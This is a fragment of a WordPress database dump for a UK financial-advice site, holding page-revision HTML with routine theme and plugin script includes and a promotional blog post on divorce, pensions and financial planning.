</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		&#13;\r\n		&#13;\r\n		&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		&#13;\r\n				&#13;\r\n				</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div style=\"clear:both;\"/></div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</article>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<article class=\"col\">\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div style=\"clear:both;\"/></article>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</section>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>				&#13;\r\n&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<article class=\"col last\"/></footer>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n	&#13;\r\n			</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[ jQuery(window).load(function() { jQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\" , animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true}); }); ]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"}; /* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"}; /* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script src=\"../wp-content/themes/Avada/js/main.js\" type=\"text/javascript\">// <![CDATA[\r\n<script type=\"text/javascript\" src=\"../wp-content/plugins/js_composer/assets/js/js_composer_front.js\"/></body></p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n// ]]></script></div>\r\n</div>\r\n</div>\r\n</div>','Financial Planning for Divorcees','Financial planning associated with divorce is not going to get any easier, it’s one of those areas where you need to take action sooner rather than later.','inherit','closed','closed','','65-revision-v1','','','2018-12-19 10:01:22','2018-12-19 10:01:22','',65,'http://www.equalitywalk.org.uk/65-revision-v1',0,'revision','',0),(359,1,'2018-12-19 10:02:14','2018-12-19 10:02:14','','divorce','','inherit','open','closed','','divorce','','','2018-12-19 10:03:39','2018-12-19 10:03:39','',65,'http://www.equalitywalk.org.uk/wp-content/uploads/2018/12/divorce.jpg',0,'attachment','image/jpeg',0);
INSERT INTO `wp_posts` VALUES (360,1,'2018-12-19 10:03:41','2018-12-19 10:03:41','<img class=\"aligncenter size-full wp-image-359\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2018/12/divorce.jpg\" alt=\"Divorce settlements\" width=\"960\" height=\"640\" />\r\n\r\n<b>“Til Divorce Do Us Part”</b>\r\n\r\nIn February last year the Office for National Statistics released some depressing figures: The ONS estimates that 42% of marriages now end in divorce  34% of marriages are expected to end in divorce by the 20th wedding anniversary.\r\n\r\nThe greatest chance of divorce is between the 4th and 8th wedding anniversaries. In 2017 there were 127,588 divorces in England and Wales: the comparable figure for Scotland (from the Registrar General) was 9,814. See stats here.\r\n\r\nThe Scottish figure was the lowest for thirty years – so on the face of it the trend may be reversing. Sadly, that is almost certainly <i>not </i>the case. It is widely accepted that the recession means that many couples who wanted to divorce simply couldn’t afford it – in some cases couples are even having to continue living together after they’ve taken the decision to divorce. But with the economy now improving we will almost certainly see an upturn in the divorce statistics.\r\n\r\n<strong>No-one gets married with the intention of splitting up</strong> – but as the figures show, all too often a marriage ends with the couple going their separate ways. If the divorce happens at a relatively young age and there are <em>no children involved then it can be a simple process</em>. If that’s the case with you, <a href=\"https://www.theguardian.com/lifeandstyle/2016/aug/23/divorce-new-rules-splitting-up-amicable-marriage-breakup\" target=\"_blank\">this website could be useful</a>.\r\n\r\nHowever, the longer a couple have been together the more complicated divorce proceedings are likely to be – <em>and the more there will be a need for financial planning advice.</em>\r\n<h2>Can Pensions Be Affected?</h2>\r\nThis is particularly true once pensions are brought into the divorce proceedings – and this trend will only increase with the Government’s drive to make sure that everyone is ultimately enrolled in a workplace pension.\r\n\r\n<strong>The value of a pension</strong> – especially if someone is in a public sector pension scheme – can run into hundreds of thousands of pounds and it can outstrip the value of the family home as the main asset a couple own.\r\n\r\nIn our experience it is still the case the pensions are all too often not valued properly in divorce proceedings, leading to one of the couple – and it is invariably the wife – being ‘short-changed.’\r\n\r\nThe financial calculations involved in divorce proceedings are being further complicated by increasing life expectancy. <em>Getting divorced can be the saddest and frustrating part of your life. <a href=\"http://www.mentalhealthamerica.net/separation-and-divorce\" target=\"_blank\">See coping advice</a>.\r\n</em>\r\n\r\nNo one ever gets married and has the expectation to later on get divorced, so of course it is a time where both will go <strong>through a long process of frustration</strong>.\r\n\r\nSigning papers and documents can be time consuming and so are the other problems that come with it, such as <strong>child custody and finance settlements</strong>. You will find these times to be very critical and having lawyers that know what they are doing can be a <em>great help as they are able to provide guidance</em>. If you are experiencing these difficulties, we recommend using <a href=\"https://emfl.com.au/property-settlements/\" target=\"_blank\">Emerson Family Law to handle your property settlements</a> and other assets.\r\n<h2>Understanding  your rights</h2>\r\nWe have some serious doubts regarding these tables, and yet they are still being relied on in many of the divorce cases that we see – often to the significant disadvantage of the wife.\r\n\r\nFinancial planning associated with divorce is not going to become any easier – and it’s one of those areas where you need to take action sooner rather than later. And yet it’s difficult – there’s an understandable reluctance to get involved in the minutiae of pensions planning.\r\n\r\nAt Equity SMART we understand how difficult a divorce can be. That’s why we give efficient, professional, easy-to-understand advice: we’ll take care of the financial side of the divorce, leaving you free to rebuild your life and look after your family. <em>You’ve enough to worry about, without worrying about money.</em>\r\n\r\n<strong>If you feel that you may be heading towards a divorce</strong> – or your clients tell you that they may be – then please don’t hesitate to get in touch with us. We’re happy to listen, and to help.\r\n<p class=\"form-submit\"><input id=\"comment_post_ID\" name=\"comment_post_ID\" type=\"hidden\" value=\"8091\" /></p>\r\n\r\n<div id=\"sidebar\" style=\"display: none;\">\r\n<div id=\"text-24\" class=\"widget widget_text\">\r\n<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big></center>people who get our best financial wisdom on a weekly basis.\r\n<a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" target=\"_blank\"><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div id=\"recent_works-widget-2\" class=\"widget recent_works\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"heading\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>New Guides</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\